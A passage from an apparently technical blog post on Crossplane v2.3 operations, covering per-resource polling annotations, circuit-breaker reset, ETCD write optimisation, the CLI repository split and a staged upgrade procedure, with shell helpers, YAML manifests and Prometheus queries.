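      if (total == 0) { print "OK: no managed resources left"; exit 0 }
      printf "BLOCKED: %d managed resources of %d kinds remain\n", total, kinds
      exit 1
    }' "$1"
}
```

&lt;p&gt;Re-run the Step 1 inventory right before calling it, so the file reflects what is still in the cluster rather than what was there before Step 3.&lt;/p&gt;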



&lt;h2&gt;
  
  
  4. Two Reconciliation Annotations — Per-Resource Polling and Immediate Trigger
&lt;/h2&gt;

&lt;p&gt;The third change resolves a six-year-old operator ask: per-resource reconcile cadence control, via two annotations.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Annotation&lt;/th&gt;
&lt;th&gt;Meaning&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;th&gt;Use case&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;crossplane.io/poll-interval&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Override controller-level poll interval for this resource&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;"24h"&lt;/code&gt;, &lt;code&gt;"30m"&lt;/code&gt;, &lt;code&gt;"5m"&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Low-volatility IAM, baseline infra&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;crossplane.io/reconcile-requested-at&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Trigger an immediate reconcile whenever the value changes&lt;/td&gt;
&lt;td&gt;RFC3339 timestamp (&lt;code&gt;"2026-05-27T08:15:00Z"&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Post-external-change sync, debugging, operational force-refresh&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  4.1 Per-Resource Poll Override — End of Global-Only Cadence
&lt;/h3&gt;

&lt;p&gt;Through v2.2 the poll interval could only be set globally, through a single flag passed at controller startup (&lt;code&gt;--poll-interval&lt;/code&gt;). As a result, an IAM Role that almost never changes was polled at the same cadence as an RDS Instance, inflating cloud-API call cost and controller load.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# IAM Role — barely changes, 24h polling is enough&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;iam.aws.m.upbound.io/v1beta1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;platform&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-node-role&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;crossplane.io/poll-interval&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;24h"&lt;/span&gt;   &lt;span class="c1"&gt;# v2.3 new&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;forProvider&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;assumeRolePolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
      &lt;span class="s"&gt;{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ec2.amazonaws.com"},"Action":"sts:AssumeRole"}]}&lt;/span&gt;
&lt;span class="s"&gt;---&lt;/span&gt;
&lt;span class="c1"&gt;# RDS Instance — fast sync for backup/snapshot state, 1m polling&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;rds.aws.m.upbound.io/v1beta1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Instance&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;marketing&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;marketing-pg&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;crossplane.io/poll-interval&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;1m"&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;forProvider&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;region&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ap-northeast-2&lt;/span&gt;
    &lt;span class="na"&gt;engine&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres&lt;/span&gt;
    &lt;span class="na"&gt;engineVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;18.4"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
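&lt;p&gt;The payoff of a per-resource override is easy to estimate: polls per day equals 86,400 seconds divided by the interval. A minimal sketch that handles single-unit durations only (&lt;code&gt;30s&lt;/code&gt;, &lt;code&gt;5m&lt;/code&gt;, &lt;code&gt;24h&lt;/code&gt;); &lt;code&gt;polls_per_day&lt;/code&gt; is a hypothetical helper, and it assumes each poll costs one observe call against the cloud API.&lt;/p&gt;

```shell
#!/usr/bin/env bash
# polls_per_day DURATION
# Prints how many times per day a resource is polled at DURATION
# (rounded down). Accepts a positive integer plus one unit: s, m or h.
# Compound Go durations such as "1h30m" are rejected in this sketch.
polls_per_day() {
  local n=${1%[smh]} unit=${1##*[0-9]} secs
  case $n in
    ''|*[!0-9]*) echo "unsupported duration: $1" >/dev/stderr; return 1 ;;
  esac
  case $unit in
    s) secs=$((10#$n)) ;;
    m) secs=$((10#$n * 60)) ;;
    h) secs=$((10#$n * 3600)) ;;
    *) echo "unsupported duration: $1" >/dev/stderr; return 1 ;;
  esac
  if [ "$secs" -eq 0 ]; then
    echo "duration must be positive" >/dev/stderr; return 1
  fi
  echo $((86400 / secs))
}

# The two intervals used in the manifests above:
#   polls_per_day 1m    -> 1440
#   polls_per_day 24h   -> 1
```

&lt;p&gt;For illustration, moving one MR from a &lt;code&gt;1m&lt;/code&gt; interval to &lt;code&gt;24h&lt;/code&gt; removes 1,439 polls per day; multiply by the number of low-volatility MRs to size the saving.&lt;/p&gt;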



&lt;h3&gt;
  
  
  4.2 Immediate Trigger — Post-External-Change Sync
&lt;/h3&gt;

&lt;p&gt;The second annotation, &lt;code&gt;reconcile-requested-at&lt;/code&gt;, re-enqueues the resource immediately whenever its value changes. Two operational examples:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Scenario 1: rotate the RDS master password out-of-band, force immediate sync&lt;/span&gt;
aws rds modify-db-instance &lt;span class="nt"&gt;--db-instance-identifier&lt;/span&gt; marketing-pg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--master-user-password&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;openssl rand &lt;span class="nt"&gt;-base64&lt;/span&gt; 32&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="nt"&gt;--apply-immediately&lt;/span&gt;
kubectl annotate &lt;span class="nt"&gt;-n&lt;/span&gt; marketing instance.rds.aws.m.upbound.io marketing-pg &lt;span class="se"&gt;\&lt;/span&gt;
  crossplane.io/reconcile-requested-at&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; +%FT%TZ&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="nt"&gt;--overwrite&lt;/span&gt;

&lt;span class="c"&gt;# Scenario 2: debug — a new Composition Function just merged, force re-evaluate every XR&lt;/span&gt;
kubectl get app &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; name | &lt;span class="k"&gt;while &lt;/span&gt;&lt;span class="nb"&gt;read &lt;/span&gt;xr&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;&lt;span class="nv"&gt;ns&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$xr&lt;/span&gt; | &lt;span class="nb"&gt;awk&lt;/span&gt; &lt;span class="nt"&gt;-F&lt;/span&gt;/ &lt;span class="s1"&gt;'{print $1}'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
  &lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$xr&lt;/span&gt; | &lt;span class="nb"&gt;awk&lt;/span&gt; &lt;span class="nt"&gt;-F&lt;/span&gt;/ &lt;span class="s1"&gt;'{print $2}'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
  kubectl annotate &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="nv"&gt;$ns&lt;/span&gt; &lt;span class="nv"&gt;$xr&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    crossplane.io/reconcile-requested-at&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; +%FT%TZ&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="nt"&gt;--overwrite&lt;/span&gt;
&lt;span class="k"&gt;done&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
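&lt;p&gt;Both scenarios come down to the same step, so it can be wrapped once. A minimal sketch: &lt;code&gt;force_reconcile&lt;/code&gt; is a hypothetical helper, and the &lt;code&gt;KUBECTL&lt;/code&gt; and &lt;code&gt;NOW&lt;/code&gt; overrides exist only so the command can be dry-run with &lt;code&gt;KUBECTL=echo&lt;/code&gt;. The timestamp has one-second resolution, so two calls within the same second write the same value, and an unchanged value does not trigger a reconcile.&lt;/p&gt;

```shell
#!/usr/bin/env bash
# force_reconcile NAMESPACE RESOURCE NAME
# Sets crossplane.io/reconcile-requested-at to the current UTC time in
# RFC3339 form. KUBECTL (default: kubectl) and NOW (default: current time)
# can be overridden for dry runs and tests.
force_reconcile() {
  local ns=$1 res=$2 name=$3
  local now=${NOW:-$(date -u +%Y-%m-%dT%H:%M:%SZ)}
  ${KUBECTL:-kubectl} annotate -n "$ns" "$res" "$name" \
    "crossplane.io/reconcile-requested-at=$now" --overwrite
}

# Dry run of Scenario 1:
#   KUBECTL=echo force_reconcile marketing instance.rds.aws.m.upbound.io marketing-pg
```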



&lt;h2&gt;
  
  
  5. XR Circuit Breaker Reset — Same-Named Replacements Start Clean
&lt;/h2&gt;

&lt;p&gt;Through v2.2, if an XR tripped its circuit breaker (Crossplane's protection against reconcile thrashing) and you deleted the XR, &lt;strong&gt;the breaker state was inherited by any same-named replacement&lt;/strong&gt;. The natural recovery instinct — "delete it, recreate it, it'll work" — didn't actually work, and operators ended up restarting controller pods to flush state.&lt;/p&gt;

&lt;p&gt;v2.3 discards the circuit-breaker state the moment the XR is deleted. A same-named replacement starts from the &lt;strong&gt;same clean state as a brand-new resource&lt;/strong&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;v2.2 (before)&lt;/th&gt;
&lt;th&gt;v2.3 (after)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;XR reconciles are throttled because of thrashing&lt;/td&gt;
&lt;td&gt;Circuit open&lt;/td&gt;
&lt;td&gt;Circuit open&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Operator deletes the XR&lt;/td&gt;
&lt;td&gt;Circuit state cached/retained&lt;/td&gt;
&lt;td&gt;Circuit state discarded immediately&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Same-named XR recreated&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Inherits open circuit → no reconcile after recreate&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Starts clean → reconciles immediately&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Recovery procedure&lt;/td&gt;
&lt;td&gt;Restart controller pod or use a different name&lt;/td&gt;
&lt;td&gt;Same name + recreate is sufficient&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Operational cognitive cost&lt;/td&gt;
&lt;td&gt;Tribal-knowledge accretion&lt;/td&gt;
&lt;td&gt;Reduced to a 1-step standard procedure&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
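&lt;p&gt;With the v2.3 behavior, the recovery path in the table reduces to three steps: delete the XR, wait until the old object is fully gone, and re-apply the same manifest. Waiting matters, because re-applying while the old XR is still terminating would patch the object being deleted instead of creating a fresh one. A minimal sketch; &lt;code&gt;recreate_xr&lt;/code&gt; is a hypothetical helper and &lt;code&gt;KUBECTL&lt;/code&gt; is overridable for dry runs.&lt;/p&gt;

```shell
#!/usr/bin/env bash
# recreate_xr MANIFEST [TIMEOUT]
# Deletes the XR(s) in MANIFEST, blocks until they are gone (finalizers
# included, up to TIMEOUT, default 5m), then applies the same manifest so a
# same-named XR is created. Nothing is applied if the delete fails.
recreate_xr() {
  local manifest=$1 timeout=${2:-5m}
  ${KUBECTL:-kubectl} delete -f "$manifest" --wait=true --timeout="$timeout" || return 1
  ${KUBECTL:-kubectl} apply -f "$manifest"
}

# Dry run:
#   KUBECTL=echo recreate_xr xrs/my-app.yaml
```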

&lt;h2&gt;
  
  
  6. No-op Status Update Skip on CompositionRevision/Composite Reconcilers
&lt;/h2&gt;

&lt;p&gt;The fifth change is an ETCD write-load optimization. Through v2.2, the CompositionRevision controller and the composite reconciler issued a status update PUT every reconcile loop, even when nothing in the status had actually changed. At cluster scale this "no-change status PUT" was a measurable fraction of ETCD traffic.&lt;/p&gt;

&lt;p&gt;v2.3 compares the previous and new status and skips the PUT when they're identical. Enable with the alpha gate &lt;code&gt;--enable-no-op-status-update-skip&lt;/code&gt;. On our staging cluster (~4,200 MRs) we measured &lt;strong&gt;ETCD PUT call volume down ~31%, apiserver CPU down ~18%&lt;/strong&gt; in steady state. The effect scales with cluster size.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Prometheus queries — before/after the alpha gate
# (1) ETCD PUT call volume
sum(rate(etcd_request_duration_seconds_count{operation="put"}[5m]))

# (2) apiserver CPU
sum(rate(container_cpu_usage_seconds_total{namespace="kube-system",pod=~"kube-apiserver-.*"}[5m]))

# (3) Crossplane controller's own reconcile rate (side-effect watch)
sum(rate(controller_runtime_reconcile_total{controller="composite"}[5m])) by (result)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
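&lt;p&gt;To turn the before/after query results into percentages like the ones quoted above, take the steady-state rate from each window and compute (before − after) / before × 100. A minimal sketch; &lt;code&gt;pct_drop&lt;/code&gt; is a hypothetical helper, and the numbers in the example are illustrative, not measurements.&lt;/p&gt;

```shell
#!/usr/bin/env bash
# pct_drop BEFORE AFTER
# Prints the percentage reduction from BEFORE to AFTER with one decimal,
# e.g. two steady-state rate() values read from query (1) or (2).
pct_drop() {
  awk -v b="$1" -v a="$2" 'BEGIN {
    if (b + 0 == 0) { print "BEFORE must be non-zero" > "/dev/stderr"; exit 1 }
    printf "%.1f\n", (b - a) * 100 / b
  }'
}

# Illustrative numbers only:
#   pct_drop 1000 690   -> 31.0
```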



&lt;h2&gt;
  
  
  7. Crossplane CLI Repository Split and Independent Release Cycle
&lt;/h2&gt;

&lt;p&gt;The sixth change affects every operator who installs the CLI, not only contributors. The CLI (formerly called &lt;code&gt;crank&lt;/code&gt;) leaves the core repo with v2.3.0. Its new home is &lt;a href="https://github.com/crossplane/crossplane-cli" rel="noopener noreferrer"&gt;github.com/crossplane/crossplane-cli&lt;/a&gt;, and from now on the CLI and core have independent version numbers and release cadences.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Axis&lt;/th&gt;
&lt;th&gt;Pre-v2.3&lt;/th&gt;
&lt;th&gt;Post-v2.3&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Repository&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;crossplane/crossplane&lt;/code&gt; (single)&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;crossplane/crossplane&lt;/code&gt; (core) + &lt;code&gt;crossplane/crossplane-cli&lt;/code&gt; (CLI)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Version sync&lt;/td&gt;
&lt;td&gt;Always identical&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Independent — CLI can move faster&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Release cadence&lt;/td&gt;
&lt;td&gt;Quarterly (3 months)&lt;/td&gt;
&lt;td&gt;Core quarterly, CLI as needed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Install command&lt;/td&gt;
&lt;td&gt;&lt;code&gt;curl ... /bin/linux_amd64/crank&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;curl ... /bin/linux_amd64/crossplane&lt;/code&gt; (unified name)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Version compatibility&lt;/td&gt;
&lt;td&gt;1:1&lt;/td&gt;
&lt;td&gt;CLI guarantees backwards compat to core N-2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Trace output&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;crossplane beta trace -o default|wide|json|dot&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;crossplane beta trace -o yaml&lt;/code&gt; (YAML output added)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
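&lt;p&gt;With independent versions, a CI job or wrapper script can check the CLI against the server before running &lt;code&gt;crossplane render&lt;/code&gt;. A minimal sketch of the N-2 rule from the table, under this sketch's own reading of it: same major version, and a core minor version between the CLI minor minus two and the CLI minor, inclusive. &lt;code&gt;cli_supports_core&lt;/code&gt; is a hypothetical helper.&lt;/p&gt;

```shell
#!/usr/bin/env bash
# cli_supports_core CLI_VERSION CORE_VERSION   (e.g. v2.3.0 2.1.4)
# Succeeds when CORE is inside the CLI's N-2 window as interpreted here:
# same major, and CORE minor from (CLI minor minus 2) up to CLI minor.
cli_supports_core() {
  local cli=${1#v} core=${2#v}
  local cli_major=${cli%%.*} core_major=${core%%.*}
  local cli_minor=${cli#*.} core_minor=${core#*.}
  cli_minor=${cli_minor%%.*}
  core_minor=${core_minor%%.*}
  [ "$cli_major" -eq "$core_major" ] || return 1
  [ "$core_minor" -le "$cli_minor" ] || return 1
  [ "$core_minor" -ge $((cli_minor - 2)) ]
}

# Examples:
#   cli_supports_core v2.3.0 v2.1.4   # succeeds (N-2)
#   cli_supports_core v2.3.0 v2.0.0   # fails (N-3)
```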

&lt;h3&gt;
  
  
  7.1 YAML Trace Output — GitOps Friendliness
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# v2.3 new: take trace output as YAML and pipe to other tools&lt;/span&gt;
crossplane beta trace &lt;span class="nt"&gt;-o&lt;/span&gt; yaml app/my-app &lt;span class="nt"&gt;-n&lt;/span&gt; marketing &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; trace.yaml

&lt;span class="c"&gt;# Combine with kubectl-tree to visualize control-plane topology&lt;/span&gt;
yq &lt;span class="s1"&gt;'.children[].name'&lt;/span&gt; trace.yaml | &lt;span class="k"&gt;while &lt;/span&gt;&lt;span class="nb"&gt;read &lt;/span&gt;child&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;kubectl tree &lt;span class="nv"&gt;$child&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; marketing
&lt;span class="k"&gt;done&lt;/span&gt;

&lt;span class="c"&gt;# Drift detection — store trace output in Git, surface diffs as PRs&lt;/span&gt;
&lt;span class="nb"&gt;cp &lt;/span&gt;trace.yaml &lt;span class="nb"&gt;history&lt;/span&gt;/trace-&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; +%Y%m%d&lt;span class="si"&gt;)&lt;/span&gt;.yaml
git add &lt;span class="nb"&gt;history&lt;/span&gt;/trace-&lt;span class="k"&gt;*&lt;/span&gt;.yaml &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; git commit &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="s2"&gt;"chore: nightly trace snapshot"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
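&lt;p&gt;Copying the trace to a new dated file every night produces a commit even when nothing changed. A minimal sketch of a guard that writes a new snapshot only when the trace differs from the newest stored one; &lt;code&gt;snapshot_trace&lt;/code&gt; is a hypothetical helper, the &lt;code&gt;history/trace-YYYYMMDD.yaml&lt;/code&gt; layout follows the commands above, and &lt;code&gt;DATE&lt;/code&gt; is an override for tests.&lt;/p&gt;

```shell
#!/usr/bin/env bash
# snapshot_trace SRC DIR
# Copies SRC to DIR/trace-YYYYMMDD.yaml only when it differs from the newest
# existing snapshot, and prints the path written. Prints nothing (and still
# succeeds) when the trace is unchanged, so the caller can skip the commit.
snapshot_trace() {
  local src=$1 dir=$2 latest="" f dest
  mkdir -p "$dir" || return 1
  # YYYYMMDD names sort chronologically, so the last glob match is the newest.
  for f in "$dir"/trace-*.yaml; do
    [ -e "$f" ] || continue
    latest=$f
  done
  if [ -n "$latest" ]; then
    if cmp -s "$src" "$latest"; then
      return 0
    fi
  fi
  dest="$dir/trace-${DATE:-$(date +%Y%m%d)}.yaml"
  cp "$src" "$dest" || return 1
  echo "$dest"
}

# Usage in the nightly job:
#   new=$(snapshot_trace trace.yaml history)
#   if [ -n "$new" ]; then git add "$new"; git commit -m "chore: nightly trace snapshot"; fi
```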



&lt;h2&gt;
  
  
  8. Upgrade Workflow — v2.2 → v2.3 (Non-Disruptive Standard)
&lt;/h2&gt;

&lt;p&gt;v2.3 is a minor upgrade inside the v2.x series, so API compatibility is preserved. Alpha gates must still be staged. Our standard four-step procedure:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Step 1: precondition check — Provider/Function packages are fully qualified URLs&lt;/span&gt;
&lt;span class="c"&gt;# v2 rejects short names, so this needs verification just before v2.2 → v2.3&lt;/span&gt;
kubectl get pkg &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{range .items[*]}{.kind}{"\t"}{.metadata.name}{"\t"}{.spec.package}{"\n"}{end}'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | &lt;span class="nb"&gt;awk&lt;/span&gt; &lt;span class="nt"&gt;-F&lt;/span&gt;&lt;span class="s1"&gt;'\t'&lt;/span&gt; &lt;span class="s1"&gt;'$3 !~ /\// {print "❌ NOT FQ:", $0}'&lt;/span&gt;
&lt;span class="c"&gt;# (must be empty to pass)&lt;/span&gt;

&lt;span class="c"&gt;# Step 2: dev cluster upgrade — alpha gates OFF&lt;/span&gt;
helm upgrade crossplane crossplane-stable/crossplane &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--version&lt;/span&gt; 2.3.0 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; crossplane-system &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--reuse-values&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--wait&lt;/span&gt;
kubectl &lt;span class="nt"&gt;-n&lt;/span&gt; crossplane-system get deploy crossplane &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{.spec.template.spec.containers[0].image}'&lt;/span&gt;
&lt;span class="c"&gt;# crossplane/crossplane:v2.3.0&lt;/span&gt;

&lt;span class="c"&gt;# Step 3: regression — render-diff every Composition against golden output&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;f &lt;span class="k"&gt;in &lt;/span&gt;compositions/&lt;span class="k"&gt;*&lt;/span&gt;.yaml&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;&lt;span class="nv"&gt;comp&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;yq &lt;span class="s1"&gt;'.metadata.name'&lt;/span&gt; &lt;span class="nv"&gt;$f&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
  crossplane render xrs/test-&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;comp&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;.yaml &lt;span class="nv"&gt;$f&lt;/span&gt; functions/index.yaml &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /tmp/render-&lt;span class="nv"&gt;$comp&lt;/span&gt;.yaml
  diff /tmp/render-&lt;span class="nv"&gt;$comp&lt;/span&gt;.yaml golden/render-&lt;span class="nv"&gt;$comp&lt;/span&gt;.golden.yaml &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"❌ regression in &lt;/span&gt;&lt;span class="nv"&gt;$comp&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;exit &lt;/span&gt;1&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="o"&gt;}&lt;/span&gt;
&lt;span class="k"&gt;done&lt;/span&gt;

&lt;span class="c"&gt;# Step 4: staged staging → prod rollout. Alpha gates: ON in staging first, then prod&lt;/span&gt;
helm upgrade crossplane crossplane-stable/crossplane &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--version&lt;/span&gt; 2.3.0 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; crossplane-system &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; &lt;span class="s1"&gt;'args={--debug,--enable-environment-configs,--enable-operations,--enable-provider-deletion-protection,--enable-no-op-status-update-skip}'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--wait&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
